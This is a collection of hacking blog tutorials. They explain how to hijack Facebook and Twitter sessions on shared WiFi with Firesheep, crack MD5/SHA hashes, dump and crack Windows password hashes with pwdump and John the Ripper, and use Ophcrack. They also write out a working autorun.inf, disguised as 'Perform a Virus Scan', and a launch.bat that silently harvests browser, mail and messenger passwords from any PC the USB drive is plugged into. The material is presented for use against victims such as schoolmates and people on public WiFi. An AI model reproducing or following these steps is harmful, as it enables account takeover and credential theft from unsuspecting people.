In my Previous tutorial Hack Facebook /twitter accounts by stealing cookies we hacked Facebook book by side jacking i.e stealing cookies and injecting them in our browser . In this tutorial we will do the same by using a tool Fire sheep .This hack works when computers are connected in  a LAN (Local area network ) or when connected in public WiFi . Best place try out this hack is in schools , collages where computers are connected in LAN and in public places such as airports , hotels  where there's public WiFi



What is Fire Sheep
Fire sheep is an extension developed by Eric Butler for the Firefox web browser. The extension uses a packet sniffer to intercept unencrypted cookies from certain websites (such as Facebook and Twitter) as the cookies are transmitted over networks, exploiting session hijacking vulnerabilities. It shows the discovered identities on a sidebar displayed in the browser, and allows the user to instantly take on the log-in credentials of the user by double-clicking on the victim's name


Hack Facebook / Twitter accounts  using Fire Sheep

Thing we Need :

1. Firefox Browser

2. Fire sheep Firefox plugin 

Procedure :

1. First Download and install Firefox browser and Fire sheep add on


2. Open Firefox , Now click the (1) view button then select (2) side bar finally click(3) fire sheep or simply press ( ctrl + shift +s ) to open fire sheep


3. Now you can see fire sheep has opened up in the side bar Now select your interface by
 going to preferences as shown


4. Now click  on start capture button and wait for a while ,




5. Now you can see different pre- authenticated  sessions on the  side bar select the session which you want .


6. Now you will be automatically logged in the victims account . You can use this tool to hack Facebook/Twitter accounts

Note :- This Hack works only  when computers are in a LAN or WiFi  

Hope you enjoyed this tutorial . In my next article we will look at some of the countermeasures that we can take against these kind of attacks  .Till then have a nice time ........


One of  my blogging  friends (Black star) has developed password cracking tool. Password Cracker 1.1 .This tool can crack  MD5,SHA-1,.. Hash codes using Dictionary Attack Method. Password Cracker 1.1 is open source (free) , you can download the tool from the following link 




Download :-


For windows Users :-
Download the Password Cracker 1.1 from Here
Open the HashCodeCracker.exe which is inside the folder .


Note :- You need JRE (Java run time Environment) to run this .If you don't have it, Download it from Oracle.com


For Linux Users 
Download the HashCodeCracke.zip file from Here
Extract the zip file, Open a new  Terminal. Navigate to the path of Extracted zip file, Type this command "java -jar HashCodeCracker.jar".Now the application will run.


How To Use Password Cracker 1.1 


1. First download the tool from the above link , then run the application ( Password Cracker 1.1 )


2. Now Select  the Input case type 
There are 3 options ., select one of them
  • Default          - As it is in the dictionary file
  • Upper case   -  Change the dictionary file input to upper case
  • Lower case   - Change the dictionary file input to lower case

3. Now Select Other type option as shown 
There are 3 options ..select one of them  

Reverse Input:  Reverse the dictionary file input.  
Example :- Let us assume the dictionary file contains the following inputs: pass, i loveyou. if you choose reverse input , it will reverse like this : "ssap","uoyevoli".

Double: Just doubles the input.
Example :- If the input is " pass " then it simply doubles it as "passpass"


Numbers at the End: Add numbers from 0 to 99. 
Example :- pass0,pass1,pass2....pass99.

4. Now paste the hash code and Select the Hash method (MD5,MD4,SHA-1,SHA-128,SHA-256,SHA-512).


5. Select a dictionary file and and click the "Crack the Hash " button.




Wait for a some time, it will return you with the password. If the hash is not cracked, then try to changing the   "other type" and "Input Case type".

Pros :- Very easy to use , Has a nice GUI (Graphical user interface ) , available for both windows and Linux platforms

Cons :- Very slow to crack , It only uses dictionary attack to crack passwords 



The MD5 Message-Digest Algorithm is a widely used cryptographic hash function that produces a 128-bit (16-byte) hash value, Md5 is an encryption that cannot be reversed, the only successful way to find out the content of a md5 hash, is by running a Brute force Attack


BarsWF Worlds Fastest MD5 Hash Cracker 
Barswf is a program designed to crack md5 hashes. It combines old with newer CUDA technologies. So, it uses your graphical card and if available, multiple cores to manage the cracking of md5 hashes. It's considered to be  the fasted Md5 Hash cracking tool available.

System Requirements
  • CUDA version only:nVidia GeForce 8xxx and up, at least 256mb of video memory.
  • LATEST nVidia-driver with CUDA support.Standard drivers might be a bit older (as CUDA 2.0 is still beta)
  • CPU with SSE2 support (P4, Core2Duo, Athlon64, Sempron64, Phenom).
  • Recommended 64-bit OS (WinXP 64 or Vista64). 32-bit version is also available.

Download 

AMD BROOK Beta 0.9:
BarsWF Brook x64
BarsWF Brook x32

CUDA 0.B:
BarsWF CUDA x64
BarsWF CUDA x32

SSE2:
BarsWF SSE x64
BarsWF SSE x32



Tutorial

The following video shows us how we can crack MD5 hashes using BarsWF





Hack Windows Password Using Pwdump and John The Ripper 



Things we need :-

1. Pwdump - To dump windows password hashes
2. John the Ripper - To crack the dumped password hashes



Procedure:-


1.  Open My computer and go to C:\Windows\system32 ,now place the Pwdump file which we download earlier

2. Now open command prompt and navigate to C:\Windows\system32 \Pwdump By Using the "cd " command  and  click enter

Example :-
Cd C:\Windows\system32 \Pwdump

3. Now you can see a list of Pwdump commands as shown


4. Now enter pwdump - localhost >>“ destination of the output file “ (for 32-bit computers) and pwdump -x localhost >> “destination of the out put file “(for 64- bit computers )


Example :-
Cd C:\Windows\system32 \Pwdump localhost >> C:\hash.txt (for 32-bit computers )


Cd C:\Windows\system32 \Pwdump -x localhost >> C:\hash.txt (for 64-bit computers)




5. Now open  the Out put  file (In my case its hash.txt )From c:/ you can see the names of the different  users with password hashes Now copy the hashes  corresponding to the admin account

6. Now make JTR (John the ripper ) crackable file by Opening a notepad and pasting the hashes which we copied in the previous step in the format given below
Example:-
User:gyuJo098KkLy9
where "gyuJo098KkLy9" is the  hash which we copied in the 5th step 

7. Save the file as crackme.txt (just an example) and go to the prompt and type 'john crackme.txt' (with out quotes ). Now wait for a while ,the password hashes will be cracked  .You can also use the Various options in John the ripper to make the cracking a little faster .For this you can refer my Tutorial on John the Ripper 


Note : You can also use any other password cracking tool or online password cracking sites like www.cracker.offensive-security.com to crack the hashes 



Ophcrack  is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.


Features:
  • Runs on Windows, Linux/Unix, Mac OS X, ...
  • Cracks LM and NTLM hashes.
  • Free tables available for Windows XP and Vista.
  • Brute-force module for simple passwords.
  • Audit mode and CSV export.
  • Real-time graphs to analyze the passwords.
  • LiveCD available to simplify the cracking.
  • Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
  • Free and open source software (GPL).


Download
Ophcrack is available in two versions (Vista Ophcrack and XP Ophcrack).You can download the latest version from the following link


Creating a bootable Ophcrack flash drive:

In the following tutorial, I will explain how to create an All In One USB Ophcrack Flash Drive. which can be used to recover, reveal or crack both Windows XP and Windows Vista login passwords.
  1. First download the Ophcrack XP Live CD ISO form the above link
  2. Insert your USB Flash Drive
  3. Download and run Universal USB Installer, select OphCrack XP, and follow the onscreen instructions
  4. Create a folder named vista_free inside the tables folder on your USB Flash Drive
  5. Download and unzip the tables_vista_free. zip to the tables/vista_free folder on your USB Flash Drive
  6. Reboot your PC and set your system to boot from the USB device
Hope this information helps you .In my next tutorial I will explain How to Hack windows password using Ophcrack Live CD/USB .Till then have a Nice time and keep visiting 




As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE ,chrome and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff /hack passwords from any computer.




Things We Need
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.


MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.


ChromePass : It is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.



Download

I have uploaded all  the Hacking tools in a single package click on the download button to download all the tools and to get the password click Here 



How to Hack Passwords Using An USB Drive

1. After downloading  all the tools, from the above link extract and copy all the executable(.exe files) which is inside the "USB pass hack" folder  into your USB- Pendrive.



2. Now open a Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from New Text Document.txt to autorun.inf ,Now copy the autorun.inf file onto your USB pen drive.

3. Now open an another Notepad and copy  the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

start ChromePass.exe /stext chrome.txt


Now save the file as launch.bat ,Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff /hack the passwords. You can use this pen-drive on any computer to sniff the stored passwords. Just follow the steps given below



1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. as  shown ,open the files to view the stored passwords


This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.


Next PostNewer Posts Previous PostOlder Posts Home